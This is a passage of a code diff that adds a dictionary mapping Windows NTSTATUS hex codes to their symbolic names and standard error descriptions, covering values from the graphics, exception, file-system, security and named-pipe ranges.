+ 0x401E0437: ("STATUS_GRAPHICS_LEADLINK_START_DEFERRED","Starting the lead adapter in a linked configuration has been temporarily deferred."),
+ 0x401E0439: ("STATUS_GRAPHICS_POLLING_TOO_FREQUENTLY","The display adapter is being polled for children too frequently at the same polling level."),
+ 0x401E043A: ("STATUS_GRAPHICS_START_DEFERRED","Starting the adapter has been temporarily deferred."),
+ 0x40230001: ("STATUS_NDIS_INDICATION_REQUIRED","The request will be completed later by an NDIS status indication."),
+ 0x80000001: ("STATUS_GUARD_PAGE_VIOLATION","{EXCEPTION} Guard Page Exception A page of memory that marks the end of a data structure, such as a stack or an array, has been accessed."),
+ 0x80000002: ("STATUS_DATATYPE_MISALIGNMENT","{EXCEPTION} Alignment Fault A data type misalignment was detected in a load or store instruction."),
+ 0x80000003: ("STATUS_BREAKPOINT","{EXCEPTION} Breakpoint A breakpoint has been reached."),
+ 0x80000004: ("STATUS_SINGLE_STEP","{EXCEPTION} Single Step A single step or trace operation has just been completed."),
+ 0x80000005: ("STATUS_BUFFER_OVERFLOW","{Buffer Overflow} The data was too large to fit into the specified buffer."),
+ 0x80000006: ("STATUS_NO_MORE_FILES","{No More Files} No more files were found which match the file specification."),
+ 0x80000007: ("STATUS_WAKE_SYSTEM_DEBUGGER","{Kernel Debugger Awakened} The system debugger was awakened by an interrupt."),
+ 0x8000000A: ("STATUS_HANDLES_CLOSED","{Handles Closed} Handles to objects have been automatically closed because of the requested operation."),
+ 0x8000000B: ("STATUS_NO_INHERITANCE","{Non-Inheritable ACL} An access control list (ACL) contains no components that can be inherited."),
+ 0x8000000C: ("STATUS_GUID_SUBSTITUTION_MADE","{GUID Substitution} During the translation of a globally unique identifier (GUID) to a Windows security ID (SID), no administratively defined GUID prefix was found. A substitute prefix was used, which will not compromise system security. However, this may provide a more restrictive access than intended."),
+ 0x8000000D: ("STATUS_PARTIAL_COPY","Because of protection conflicts, not all the requested bytes could be copied."),
+ 0x8000000E: ("STATUS_DEVICE_PAPER_EMPTY","{Out of Paper} The printer is out of paper."),
+ 0x8000000F: ("STATUS_DEVICE_POWERED_OFF","{Device Power Is Off} The printer power has been turned off."),
+ 0x80000010: ("STATUS_DEVICE_OFF_LINE","{Device Offline} The printer has been taken offline."),
+ 0x80000011: ("STATUS_DEVICE_BUSY","{Device Busy} The device is currently busy."),
+ 0x80000012: ("STATUS_NO_MORE_EAS","{No More EAs} No more extended attributes (EAs) were found for the file."),
+ 0x80000013: ("STATUS_INVALID_EA_NAME","{Illegal EA} The specified extended attribute (EA) name contains at least one illegal character."),
+ 0x80000014: ("STATUS_EA_LIST_INCONSISTENT","{Inconsistent EA List} The extended attribute (EA) list is inconsistent."),
+ 0x80000015: ("STATUS_INVALID_EA_FLAG","{Invalid EA Flag} An invalid extended attribute (EA) flag was set."),
+ 0x80000016: ("STATUS_VERIFY_REQUIRED","{Verifying Disk} The media has changed and a verify operation is in progress; therefore, no reads or writes may be performed to the device, except those that are used in the verify operation."),
+ 0x80000017: ("STATUS_EXTRANEOUS_INFORMATION","{Too Much Information} The specified access control list (ACL) contained more information than was expected."),
+ 0x80000018: ("STATUS_RXACT_COMMIT_NECESSARY","This warning level status indicates that the transaction state already exists for the registry subtree, but that a transaction commit was previously aborted. The commit has NOT been completed but has not been rolled back either; therefore, it may still be committed, if needed."),
+ 0x8000001A: ("STATUS_NO_MORE_ENTRIES","{No More Entries} No more entries are available from an enumeration operation."),
+ 0x8000001B: ("STATUS_FILEMARK_DETECTED","{Filemark Found} A filemark was detected."),
+ 0x8000001C: ("STATUS_MEDIA_CHANGED","{Media Changed} The media may have changed."),
+ 0x8000001D: ("STATUS_BUS_RESET","{I/O Bus Reset} An I/O bus reset was detected."),
+ 0x8000001E: ("STATUS_END_OF_MEDIA","{End of Media} The end of the media was encountered."),
+ 0x8000001F: ("STATUS_BEGINNING_OF_MEDIA","The beginning of a tape or partition has been detected."),
+ 0x80000020: ("STATUS_MEDIA_CHECK","{Media Changed} The media may have changed."),
+ 0x80000021: ("STATUS_SETMARK_DETECTED","A tape access reached a set mark."),
+ 0x80000022: ("STATUS_NO_DATA_DETECTED","During a tape access, the end of the data written is reached."),
+ 0x80000023: ("STATUS_REDIRECTOR_HAS_OPEN_HANDLES","The redirector is in use and cannot be unloaded."),
+ 0x80000024: ("STATUS_SERVER_HAS_OPEN_HANDLES","The server is in use and cannot be unloaded."),
+ 0x80000025: ("STATUS_ALREADY_DISCONNECTED","The specified connection has already been disconnected."),
+ 0x80000026: ("STATUS_LONGJUMP","A long jump has been executed."),
+ 0x80000027: ("STATUS_CLEANER_CARTRIDGE_INSTALLED","A cleaner cartridge is present in the tape library."),
+ 0x80000028: ("STATUS_PLUGPLAY_QUERY_VETOED","The Plug and Play query operation was not successful."),
+ 0x80000029: ("STATUS_UNWIND_CONSOLIDATE","A frame consolidation has been executed."),
+ 0x8000002A: ("STATUS_REGISTRY_HIVE_RECOVERED","{Registry Hive Recovered} The registry hive (file): %hs was corrupted and it has been recovered. Some data might have been lost."),
+ 0x8000002B: ("STATUS_DLL_MIGHT_BE_INSECURE","The application is attempting to run executable code from the module %hs. This may be insecure. An alternative, %hs, is available. Should the application use the secure module %hs?"),
+ 0x8000002C: ("STATUS_DLL_MIGHT_BE_INCOMPATIBLE","The application is loading executable code from the module %hs. This is secure but may be incompatible with previous releases of the operating system. An alternative, %hs, is available. Should the application use the secure module %hs?"),
+ 0x8000002D: ("STATUS_STOPPED_ON_SYMLINK","The create operation stopped after reaching a symbolic link."),
+ 0x80000288: ("STATUS_DEVICE_REQUIRES_CLEANING","The device has indicated that cleaning is necessary."),
+ 0x80000289: ("STATUS_DEVICE_DOOR_OPEN","The device has indicated that its door is open. Further operations require it closed and secured."),
+ 0x80000803: ("STATUS_DATA_LOST_REPAIR","Windows discovered a corruption in the file %hs. This file has now been repaired. Check if any data in the file was lost because of the corruption."),
+ 0x80010001: ("DBG_EXCEPTION_NOT_HANDLED","Debugger did not handle the exception."),
+ 0x80130001: ("STATUS_CLUSTER_NODE_ALREADY_UP","The cluster node is already up."),
+ 0x80130002: ("STATUS_CLUSTER_NODE_ALREADY_DOWN","The cluster node is already down."),
+ 0x80130003: ("STATUS_CLUSTER_NETWORK_ALREADY_ONLINE","The cluster network is already online."),
+ 0x80130004: ("STATUS_CLUSTER_NETWORK_ALREADY_OFFLINE","The cluster network is already offline."),
+ 0x80130005: ("STATUS_CLUSTER_NODE_ALREADY_MEMBER","The cluster node is already a member of the cluster."),
+ 0x80190009: ("STATUS_COULD_NOT_RESIZE_LOG","The log could not be set to the requested size."),
+ 0x80190029: ("STATUS_NO_TXF_METADATA","There is no transaction metadata on the file."),
+ 0x80190031: ("STATUS_CANT_RECOVER_WITH_HANDLE_OPEN","The file cannot be recovered because there is a handle still open on it."),
+ 0x80190041: ("STATUS_TXF_METADATA_ALREADY_PRESENT","Transaction metadata is already present on this file and cannot be superseded."),
+ 0x80190042: ("STATUS_TRANSACTION_SCOPE_CALLBACKS_NOT_SET","A transaction scope could not be entered because the scope handler has not been initialized."),
+ 0x801B00EB: ("STATUS_VIDEO_HUNG_DISPLAY_DRIVER_THREAD_RECOVERED","{Display Driver Stopped Responding and recovered} The %hs display driver has stopped working normally. The recovery had been performed."),
+ 0x801C0001: ("STATUS_FLT_BUFFER_TOO_SMALL","{Buffer too small} The buffer is too small to contain the entry. No information has been written to the buffer."),
+ 0x80210001: ("STATUS_FVE_PARTIAL_METADATA","Volume metadata read or write is incomplete."),
+ 0x80210002: ("STATUS_FVE_TRANSIENT_STATE","BitLocker encryption keys were ignored because the volume was in a transient state."),
+ 0xC0000001: ("STATUS_UNSUCCESSFUL","{Operation Failed} The requested operation was unsuccessful."),
+ 0xC0000002: ("STATUS_NOT_IMPLEMENTED","{Not Implemented} The requested operation is not implemented."),
+ 0xC0000003: ("STATUS_INVALID_INFO_CLASS","{Invalid Parameter} The specified information class is not a valid information class for the specified object."),
+ 0xC0000004: ("STATUS_INFO_LENGTH_MISMATCH","The specified information record length does not match the length that is required for the specified information class."),
+ 0xC0000005: ("STATUS_ACCESS_VIOLATION","The instruction at 0x%08lx referenced memory at 0x%08lx. The memory could not be %s."),
+ 0xC0000006: ("STATUS_IN_PAGE_ERROR","The instruction at 0x%08lx referenced memory at 0x%08lx. The required data was not placed into memory because of an I/O error status of 0x%08lx."),
+ 0xC0000007: ("STATUS_PAGEFILE_QUOTA","The page file quota for the process has been exhausted."),
+ 0xC0000008: ("STATUS_INVALID_HANDLE","An invalid HANDLE was specified."),
+ 0xC0000009: ("STATUS_BAD_INITIAL_STACK","An invalid initial stack was specified in a call to NtCreateThread."),
+ 0xC000000A: ("STATUS_BAD_INITIAL_PC","An invalid initial start address was specified in a call to NtCreateThread."),
+ 0xC000000B: ("STATUS_INVALID_CID","An invalid client ID was specified."),
+ 0xC000000C: ("STATUS_TIMER_NOT_CANCELED","An attempt was made to cancel or set a timer that has an associated APC and the specified thread is not the thread that originally set the timer with an associated APC routine."),
+ 0xC000000D: ("STATUS_INVALID_PARAMETER","An invalid parameter was passed to a service or function."),
+ 0xC000000E: ("STATUS_NO_SUCH_DEVICE","A device that does not exist was specified."),
+ 0xC000000F: ("STATUS_NO_SUCH_FILE","{File Not Found} The file %hs does not exist."),
+ 0xC0000010: ("STATUS_INVALID_DEVICE_REQUEST","The specified request is not a valid operation for the target device."),
+ 0xC0000011: ("STATUS_END_OF_FILE","The end-of-file marker has been reached. There is no valid data in the file beyond this marker."),
+ 0xC0000012: ("STATUS_WRONG_VOLUME","{Wrong Volume} The wrong volume is in the drive. Insert volume %hs into drive %hs."),
+ 0xC0000013: ("STATUS_NO_MEDIA_IN_DEVICE","{No Disk} There is no disk in the drive. Insert a disk into drive %hs."),
+ 0xC0000014: ("STATUS_UNRECOGNIZED_MEDIA","{Unknown Disk Format} The disk in drive %hs is not formatted properly. Check the disk, and reformat it, if needed."),
+ 0xC0000015: ("STATUS_NONEXISTENT_SECTOR","{Sector Not Found} The specified sector does not exist."),
+ 0xC0000016: ("STATUS_MORE_PROCESSING_REQUIRED","{Still Busy} The specified I/O request packet (IRP) cannot be disposed of because the I/O operation is not complete."),
+ 0xC0000017: ("STATUS_NO_MEMORY","{Not Enough Quota} Not enough virtual memory or paging file quota is available to complete the specified operation."),
+ 0xC0000018: ("STATUS_CONFLICTING_ADDRESSES","{Conflicting Address Range} The specified address range conflicts with the address space."),
+ 0xC0000019: ("STATUS_NOT_MAPPED_VIEW","The address range to unmap is not a mapped view."),
+ 0xC000001A: ("STATUS_UNABLE_TO_FREE_VM","The virtual memory cannot be freed."),
+ 0xC000001B: ("STATUS_UNABLE_TO_DELETE_SECTION","The specified section cannot be deleted."),
+ 0xC000001C: ("STATUS_INVALID_SYSTEM_SERVICE","An invalid system service was specified in a system service call."),
+ 0xC000001D: ("STATUS_ILLEGAL_INSTRUCTION","{EXCEPTION} Illegal Instruction An attempt was made to execute an illegal instruction."),
+ 0xC000001E: ("STATUS_INVALID_LOCK_SEQUENCE","{Invalid Lock Sequence} An attempt was made to execute an invalid lock sequence."),
+ 0xC000001F: ("STATUS_INVALID_VIEW_SIZE","{Invalid Mapping} An attempt was made to create a view for a section that is bigger than the section."),
+ 0xC0000020: ("STATUS_INVALID_FILE_FOR_SECTION","{Bad File} The attributes of the specified mapping file for a section of memory cannot be read."),
+ 0xC0000021: ("STATUS_ALREADY_COMMITTED","{Already Committed} The specified address range is already committed."),
+ 0xC0000022: ("STATUS_ACCESS_DENIED","{Access Denied} A process has requested access to an object but has not been granted those access rights."),
+ 0xC0000023: ("STATUS_BUFFER_TOO_SMALL","{Buffer Too Small} The buffer is too small to contain the entry. No information has been written to the buffer."),
+ 0xC0000024: ("STATUS_OBJECT_TYPE_MISMATCH","{Wrong Type} There is a mismatch between the type of object that is required by the requested operation and the type of object that is specified in the request."),
+ 0xC0000025: ("STATUS_NONCONTINUABLE_EXCEPTION","{EXCEPTION} Cannot Continue Windows cannot continue from this exception."),
+ 0xC0000026: ("STATUS_INVALID_DISPOSITION","An invalid exception disposition was returned by an exception handler."),
+ 0xC0000027: ("STATUS_UNWIND","Unwind exception code."),
+ 0xC0000028: ("STATUS_BAD_STACK","An invalid or unaligned stack was encountered during an unwind operation."),
+ 0xC0000029: ("STATUS_INVALID_UNWIND_TARGET","An invalid unwind target was encountered during an unwind operation."),
+ 0xC000002A: ("STATUS_NOT_LOCKED","An attempt was made to unlock a page of memory that was not locked."),
+ 0xC000002B: ("STATUS_PARITY_ERROR","A device parity error on an I/O operation."),
+ 0xC000002C: ("STATUS_UNABLE_TO_DECOMMIT_VM","An attempt was made to decommit uncommitted virtual memory."),
+ 0xC000002D: ("STATUS_NOT_COMMITTED","An attempt was made to change the attributes on memory that has not been committed."),
+ 0xC000002E: ("STATUS_INVALID_PORT_ATTRIBUTES","Invalid object attributes specified to NtCreatePort or invalid port attributes specified to NtConnectPort."),
+ 0xC000002F: ("STATUS_PORT_MESSAGE_TOO_LONG","The length of the message that was passed to NtRequestPort or NtRequestWaitReplyPort is longer than the maximum message that is allowed by the port."),
+ 0xC0000030: ("STATUS_INVALID_PARAMETER_MIX","An invalid combination of parameters was specified."),
+ 0xC0000031: ("STATUS_INVALID_QUOTA_LOWER","An attempt was made to lower a quota limit below the current usage."),
+ 0xC0000032: ("STATUS_DISK_CORRUPT_ERROR","{Corrupt Disk} The file system structure on the disk is corrupt and unusable. Run the Chkdsk utility on the volume %hs."),
+ 0xC0000033: ("STATUS_OBJECT_NAME_INVALID","The object name is invalid."),
+ 0xC0000034: ("STATUS_OBJECT_NAME_NOT_FOUND","The object name is not found."),
+ 0xC0000035: ("STATUS_OBJECT_NAME_COLLISION","The object name already exists."),
+ 0xC0000037: ("STATUS_PORT_DISCONNECTED","An attempt was made to send a message to a disconnected communication port."),
+ 0xC0000038: ("STATUS_DEVICE_ALREADY_ATTACHED","An attempt was made to attach to a device that was already attached to another device."),
+ 0xC0000039: ("STATUS_OBJECT_PATH_INVALID","The object path component was not a directory object."),
+ 0xC000003A: ("STATUS_OBJECT_PATH_NOT_FOUND","{Path Not Found} The path %hs does not exist."),
+ 0xC000003B: ("STATUS_OBJECT_PATH_SYNTAX_BAD","The object path component was not a directory object."),
+ 0xC000003C: ("STATUS_DATA_OVERRUN","{Data Overrun} A data overrun error occurred."),
+ 0xC000003D: ("STATUS_DATA_LATE_ERROR","{Data Late} A data late error occurred."),
+ 0xC000003E: ("STATUS_DATA_ERROR","{Data Error} An error occurred in reading or writing data."),
+ 0xC000003F: ("STATUS_CRC_ERROR","{Bad CRC} A cyclic redundancy check (CRC) checksum error occurred."),
+ 0xC0000040: ("STATUS_SECTION_TOO_BIG","{Section Too Large} The specified section is too big to map the file."),
+ 0xC0000041: ("STATUS_PORT_CONNECTION_REFUSED","The NtConnectPort request is refused."),
+ 0xC0000042: ("STATUS_INVALID_PORT_HANDLE","The type of port handle is invalid for the operation that is requested."),
+ 0xC0000043: ("STATUS_SHARING_VIOLATION","A file cannot be opened because the share access flags are incompatible."),
+ 0xC0000044: ("STATUS_QUOTA_EXCEEDED","Insufficient quota exists to complete the operation."),
+ 0xC0000045: ("STATUS_INVALID_PAGE_PROTECTION","The specified page protection was not valid."),
+ 0xC0000046: ("STATUS_MUTANT_NOT_OWNED","An attempt to release a mutant object was made by a thread that was not the owner of the mutant object."),
+ 0xC0000047: ("STATUS_SEMAPHORE_LIMIT_EXCEEDED","An attempt was made to release a semaphore such that its maximum count would have been exceeded."),
+ 0xC0000048: ("STATUS_PORT_ALREADY_SET","An attempt was made to set the DebugPort or ExceptionPort of a process, but a port already exists in the process, or an attempt was made to set the CompletionPort of a file but a port was already set in the file, or an attempt was made to set the associated completion port of an ALPC port but it is already set."),
+ 0xC0000049: ("STATUS_SECTION_NOT_IMAGE","An attempt was made to query image information on a section that does not map an image."),
+ 0xC000004A: ("STATUS_SUSPEND_COUNT_EXCEEDED","An attempt was made to suspend a thread whose suspend count was at its maximum."),
+ 0xC000004B: ("STATUS_THREAD_IS_TERMINATING","An attempt was made to suspend a thread that has begun termination."),
+ 0xC000004C: ("STATUS_BAD_WORKING_SET_LIMIT","An attempt was made to set the working set limit to an invalid value (for example, the minimum greater than maximum)."),
+ 0xC000004D: ("STATUS_INCOMPATIBLE_FILE_MAP","A section was created to map a file that is not compatible with an already existing section that maps the same file."),
+ 0xC000004E: ("STATUS_SECTION_PROTECTION","A view to a section specifies a protection that is incompatible with the protection of the initial view."),
+ 0xC000004F: ("STATUS_EAS_NOT_SUPPORTED","An operation involving EAs failed because the file system does not support EAs."),
+ 0xC0000050: ("STATUS_EA_TOO_LARGE","An EA operation failed because the EA set is too large."),
+ 0xC0000051: ("STATUS_NONEXISTENT_EA_ENTRY","An EA operation failed because the name or EA index is invalid."),
+ 0xC0000052: ("STATUS_NO_EAS_ON_FILE","The file for which EAs were requested has no EAs."),
+ 0xC0000053: ("STATUS_EA_CORRUPT_ERROR","The EA is corrupt and cannot be read."),
+ 0xC0000054: ("STATUS_FILE_LOCK_CONFLICT","A requested read/write cannot be granted due to a conflicting file lock."),
+ 0xC0000055: ("STATUS_LOCK_NOT_GRANTED","A requested file lock cannot be granted due to other existing locks."),
+ 0xC0000056: ("STATUS_DELETE_PENDING","A non-close operation has been requested of a file object that has a delete pending."),
+ 0xC0000057: ("STATUS_CTL_FILE_NOT_SUPPORTED","An attempt was made to set the control attribute on a file. This attribute is not supported in the destination file system."),
+ 0xC0000058: ("STATUS_UNKNOWN_REVISION","Indicates a revision number that was encountered or specified is not one that is known by the service. It may be a more recent revision than the service is aware of."),
+ 0xC0000059: ("STATUS_REVISION_MISMATCH","Indicates that two revision levels are incompatible."),
+ 0xC000005A: ("STATUS_INVALID_OWNER","Indicates a particular security ID may not be assigned as the owner of an object."),
+ 0xC000005B: ("STATUS_INVALID_PRIMARY_GROUP","Indicates a particular security ID may not be assigned as the primary group of an object."),
+ 0xC000005C: ("STATUS_NO_IMPERSONATION_TOKEN","An attempt has been made to operate on an impersonation token by a thread that is not currently impersonating a client."),
+ 0xC000005D: ("STATUS_CANT_DISABLE_MANDATORY","A mandatory group may not be disabled."),
+ 0xC000005E: ("STATUS_NO_LOGON_SERVERS","No logon servers are currently available to service the logon request."),
+ 0xC000005F: ("STATUS_NO_SUCH_LOGON_SESSION","A specified logon session does not exist. It may already have been terminated."),
+ 0xC0000060: ("STATUS_NO_SUCH_PRIVILEGE","A specified privilege does not exist."),
+ 0xC0000061: ("STATUS_PRIVILEGE_NOT_HELD","A required privilege is not held by the client."),
+ 0xC0000062: ("STATUS_INVALID_ACCOUNT_NAME","The name provided is not a properly formed account name."),
+ 0xC0000063: ("STATUS_USER_EXISTS","The specified account already exists."),
+ 0xC0000064: ("STATUS_NO_SUCH_USER","The specified account does not exist."),
+ 0xC0000065: ("STATUS_GROUP_EXISTS","The specified group already exists."),
+ 0xC0000066: ("STATUS_NO_SUCH_GROUP","The specified group does not exist."),
+ 0xC0000067: ("STATUS_MEMBER_IN_GROUP","The specified user account is already in the specified group account. Also used to indicate a group cannot be deleted because it contains a member."),
+ 0xC0000068: ("STATUS_MEMBER_NOT_IN_GROUP","The specified user account is not a member of the specified group account."),
+ 0xC0000069: ("STATUS_LAST_ADMIN","Indicates the requested operation would disable or delete the last remaining administration account. This is not allowed to prevent creating a situation in which the system cannot be administrated."),
+ 0xC000006A: ("STATUS_WRONG_PASSWORD","When trying to update a password, this return status indicates that the value provided as the current password is not correct."),
+ 0xC000006B: ("STATUS_ILL_FORMED_PASSWORD","When trying to update a password, this return status indicates that the value provided for the new password contains values that are not allowed in passwords."),
+ 0xC000006C: ("STATUS_PASSWORD_RESTRICTION","When trying to update a password, this status indicates that some password update rule has been violated. For example, the password may not meet length criteria."),
+ 0xC000006D: ("STATUS_LOGON_FAILURE","The attempted logon is invalid. This is either due to a bad username or authentication information."),
+ 0xC000006E: ("STATUS_ACCOUNT_RESTRICTION","Indicates a referenced user name and authentication information are valid, but some user account restriction has prevented successful authentication (such as time-of-day restrictions)."),
+ 0xC000006F: ("STATUS_INVALID_LOGON_HOURS","The user account has time restrictions and may not be logged onto at this time."),
+ 0xC0000070: ("STATUS_INVALID_WORKSTATION","The user account is restricted so that it may not be used to log on from the source workstation."),
+ 0xC0000071: ("STATUS_PASSWORD_EXPIRED","The user account password has expired."),
+ 0xC0000072: ("STATUS_ACCOUNT_DISABLED","The referenced account is currently disabled and may not be logged on to."),
+ 0xC0000073: ("STATUS_NONE_MAPPED","None of the information to be translated has been translated."),
+ 0xC0000074: ("STATUS_TOO_MANY_LUIDS_REQUESTED","The number of LUIDs requested may not be allocated with a single allocation."),
+ 0xC0000075: ("STATUS_LUIDS_EXHAUSTED","Indicates there are no more LUIDs to allocate."),
+ 0xC0000076: ("STATUS_INVALID_SUB_AUTHORITY","Indicates the sub-authority value is invalid for the particular use."),
+ 0xC0000077: ("STATUS_INVALID_ACL","Indicates the ACL structure is not valid."),
+ 0xC0000078: ("STATUS_INVALID_SID","Indicates the SID structure is not valid."),
+ 0xC0000079: ("STATUS_INVALID_SECURITY_DESCR","Indicates the SECURITY_DESCRIPTOR structure is not valid."),
+ 0xC000007A: ("STATUS_PROCEDURE_NOT_FOUND","Indicates the specified procedure address cannot be found in the DLL."),
+ 0xC000007B: ("STATUS_INVALID_IMAGE_FORMAT","{Bad Image} %hs is either not designed to run on Windows or it contains an error. Try installing the program again using the original installation media or contact your system administrator or the software vendor for support."),
+ 0xC000007C: ("STATUS_NO_TOKEN","An attempt was made to reference a token that does not exist. This is typically done by referencing the token that is associated with a thread when the thread is not impersonating a client."),
+ 0xC000007D: ("STATUS_BAD_INHERITANCE_ACL","Indicates that an attempt to build either an inherited ACL or ACE was not successful. This can be caused by a number of things. One of the more probable causes is the replacement of a CreatorId with a SID that did not fit into the ACE or ACL."),
+ 0xC000007E: ("STATUS_RANGE_NOT_LOCKED","The range specified in NtUnlockFile was not locked."),
+ 0xC000007F: ("STATUS_DISK_FULL","An operation failed because the disk was full."),
+ 0xC0000080: ("STATUS_SERVER_DISABLED","The GUID allocation server is disabled at the moment."),
+ 0xC0000081: ("STATUS_SERVER_NOT_DISABLED","The GUID allocation server is enabled at the moment."),
+ 0xC0000082: ("STATUS_TOO_MANY_GUIDS_REQUESTED","Too many GUIDs were requested from the allocation server at once."),
+ 0xC0000083: ("STATUS_GUIDS_EXHAUSTED","The GUIDs could not be allocated because the Authority Agent was exhausted."),
+ 0xC0000084: ("STATUS_INVALID_ID_AUTHORITY","The value provided was an invalid value for an identifier authority."),
+ 0xC0000085: ("STATUS_AGENTS_EXHAUSTED","No more authority agent values are available for the particular identifier authority value."),
+ 0xC0000086: ("STATUS_INVALID_VOLUME_LABEL","An invalid volume label has been specified."),
+ 0xC0000087: ("STATUS_SECTION_NOT_EXTENDED","A mapped section could not be extended."),
+ 0xC0000088: ("STATUS_NOT_MAPPED_DATA","Specified section to flush does not map a data file."),
+ 0xC0000089: ("STATUS_RESOURCE_DATA_NOT_FOUND","Indicates the specified image file did not contain a resource section."),
+ 0xC000008A: ("STATUS_RESOURCE_TYPE_NOT_FOUND","Indicates the specified resource type cannot be found in the image file."),
+ 0xC000008B: ("STATUS_RESOURCE_NAME_NOT_FOUND","Indicates the specified resource name cannot be found in the image file."),
+ 0xC000008C: ("STATUS_ARRAY_BOUNDS_EXCEEDED","{EXCEPTION} Array bounds exceeded."),
+ 0xC000008D: ("STATUS_FLOAT_DENORMAL_OPERAND","{EXCEPTION} Floating-point denormal operand."),
+ 0xC000008E: ("STATUS_FLOAT_DIVIDE_BY_ZERO","{EXCEPTION} Floating-point division by zero."),
+ 0xC000008F: ("STATUS_FLOAT_INEXACT_RESULT","{EXCEPTION} Floating-point inexact result."),
+ 0xC0000090: ("STATUS_FLOAT_INVALID_OPERATION","{EXCEPTION} Floating-point invalid operation."),
+ 0xC0000091: ("STATUS_FLOAT_OVERFLOW","{EXCEPTION} Floating-point overflow."),
+ 0xC0000092: ("STATUS_FLOAT_STACK_CHECK","{EXCEPTION} Floating-point stack check."),
+ 0xC0000093: ("STATUS_FLOAT_UNDERFLOW","{EXCEPTION} Floating-point underflow."),
+ 0xC0000094: ("STATUS_INTEGER_DIVIDE_BY_ZERO","{EXCEPTION} Integer division by zero."),
+ 0xC0000095: ("STATUS_INTEGER_OVERFLOW","{EXCEPTION} Integer overflow."),
+ 0xC0000096: ("STATUS_PRIVILEGED_INSTRUCTION","{EXCEPTION} Privileged instruction."),
+ 0xC0000097: ("STATUS_TOO_MANY_PAGING_FILES","An attempt was made to install more paging files than the system supports."),
+ 0xC0000098: ("STATUS_FILE_INVALID","The volume for a file has been externally altered such that the opened file is no longer valid."),
+ 0xC0000099: ("STATUS_ALLOTTED_SPACE_EXCEEDED","When a block of memory is allotted for future updates, such as the memory allocated to hold discretionary access control and primary group information, successive updates may exceed the amount of memory originally allotted. Because a quota may already have been charged to several processes that have handles to the object, it is not reasonable to alter the size of the allocated memory. Instead, a request that requires more memory than has been allotted must fail and the STATUS_ALLOTTED_SPACE_EXCEEDED error returned."),
+ 0xC000009A: ("STATUS_INSUFFICIENT_RESOURCES","Insufficient system resources exist to complete the API."),
+ 0xC000009B: ("STATUS_DFS_EXIT_PATH_FOUND","An attempt has been made to open a DFS exit path control file."),
+ 0xC000009C: ("STATUS_DEVICE_DATA_ERROR","There are bad blocks (sectors) on the hard disk."),
+ 0xC000009D: ("STATUS_DEVICE_NOT_CONNECTED","There is bad cabling, non-termination, or the controller is not able to obtain access to the hard disk."),
+ 0xC000009F: ("STATUS_FREE_VM_NOT_AT_BASE","Virtual memory cannot be freed because the base address is not the base of the region and a region size of zero was specified."),
+ 0xC00000A0: ("STATUS_MEMORY_NOT_ALLOCATED","An attempt was made to free virtual memory that is not allocated."),
+ 0xC00000A1: ("STATUS_WORKING_SET_QUOTA","The working set is not big enough to allow the requested pages to be locked."),
+ 0xC00000A2: ("STATUS_MEDIA_WRITE_PROTECTED","{Write Protect Error} The disk cannot be written to because it is write-protected. Remove the write protection from the volume %hs in drive %hs."),
+ 0xC00000A3: ("STATUS_DEVICE_NOT_READY","{Drive Not Ready} The drive is not ready for use; its door may be open. Check drive %hs and make sure that a disk is inserted and that the drive door is closed."),
+ 0xC00000A4: ("STATUS_INVALID_GROUP_ATTRIBUTES","The specified attributes are invalid or are incompatible with the attributes for the group as a whole."),
+ 0xC00000A5: ("STATUS_BAD_IMPERSONATION_LEVEL","A specified impersonation level is invalid. Also used to indicate that a required impersonation level was not provided."),
+ 0xC00000A6: ("STATUS_CANT_OPEN_ANONYMOUS","An attempt was made to open an anonymous-level token. Anonymous tokens may not be opened."),
+ 0xC00000A7: ("STATUS_BAD_VALIDATION_CLASS","The validation information class requested was invalid."),
+ 0xC00000A8: ("STATUS_BAD_TOKEN_TYPE","The type of a token object is inappropriate for its attempted use."),
+ 0xC00000A9: ("STATUS_BAD_MASTER_BOOT_RECORD","The type of a token object is inappropriate for its attempted use."),
+ 0xC00000AA: ("STATUS_INSTRUCTION_MISALIGNMENT","An attempt was made to execute an instruction at an unaligned address and the host system does not support unaligned instruction references."),
+ 0xC00000AB: ("STATUS_INSTANCE_NOT_AVAILABLE","The maximum named pipe instance count has been reached."),
+ 0xC00000AC: ("STATUS_PIPE_NOT_AVAILABLE","An instance of a named pipe cannot be found in the listening state."),
+ 0xC00000AD: ("STATUS_INVALID_PIPE_STATE","The named pipe is not in the connected or closing state."),
+ 0xC00000AE: ("STATUS_PIPE_BUSY","The specified pipe is set to complete operations and there are current I/O operations queued so that it cannot be changed to queue operations."),
+ 0xC00000AF: ("STATUS_ILLEGAL_FUNCTION","The specified handle is not open to the server end of the named pipe."),
+ 0xC00000B0: ("STATUS_PIPE_DISCONNECTED","The specified named pipe is in the disconnected state."),
+ 0xC00000B1: ("STATUS_PIPE_CLOSING","The specified named pipe is in the closing state."),
+ 0xC00000B2: ("STATUS_PIPE_CONNECTED","The specified named pipe is in the connected state."),
+ 0xC00000B3: ("STATUS_PIPE_LISTENING","The specified named pipe is in the listening state."),
+ 0xC00000B4: ("STATUS_INVALID_READ_MODE","The specified named pipe is not in message mode."),
+ 0xC00000B5: ("STATUS_IO_TIMEOUT","{Device Timeout} The specified I/O operation on %hs was not completed before the time-out period expired."),
+ 0xC00000B6: ("STATUS_FILE_FORCED_CLOSED","The specified file has been closed by another process."),
+ 0xC00000B7: ("STATUS_PROFILING_NOT_STARTED","Profiling is not started."),
+ 0xC00000B8: ("STATUS_PROFILING_NOT_STOPPED","Profiling is not stopped."),
+ 0xC00000B9: ("STATUS_COULD_NOT_INTERPRET","The passed ACL did not contain the minimum required information."),
+ 0xC00000BA: ("STATUS_FILE_IS_A_DIRECTORY","The file that was specified as a target is a directory, and the caller specified that it could be anything but a directory."),
+ 0xC00000BB: ("STATUS_NOT_SUPPORTED","The request is not supported."),
+ 0xC00000BC: ("STATUS_REMOTE_NOT_LISTENING","This remote computer is not listening."),
+ 0xC00000BD: ("STATUS_DUPLICATE_NAME","A duplicate name exists on the network."),
+ 0xC00000BE: ("STATUS_BAD_NETWORK_PATH","The network path cannot be located."),
+ 0xC00000BF: ("STATUS_NETWORK_BUSY","The network is busy."),
+ 0xC00000C0: ("STATUS_DEVICE_DOES_NOT_EXIST","This device does not exist."),
+ 0xC00000C1: ("STATUS_TOO_MANY_COMMANDS","The network BIOS command limit has been reached."),
+ 0xC00000C2: ("STATUS_ADAPTER_HARDWARE_ERROR","An I/O adapter hardware error has occurred."),
+ 0xC00000C3: ("STATUS_INVALID_NETWORK_RESPONSE","The network responded incorrectly."),
+ 0xC00000C4: ("STATUS_UNEXPECTED_NETWORK_ERROR","An unexpected network error occurred."),
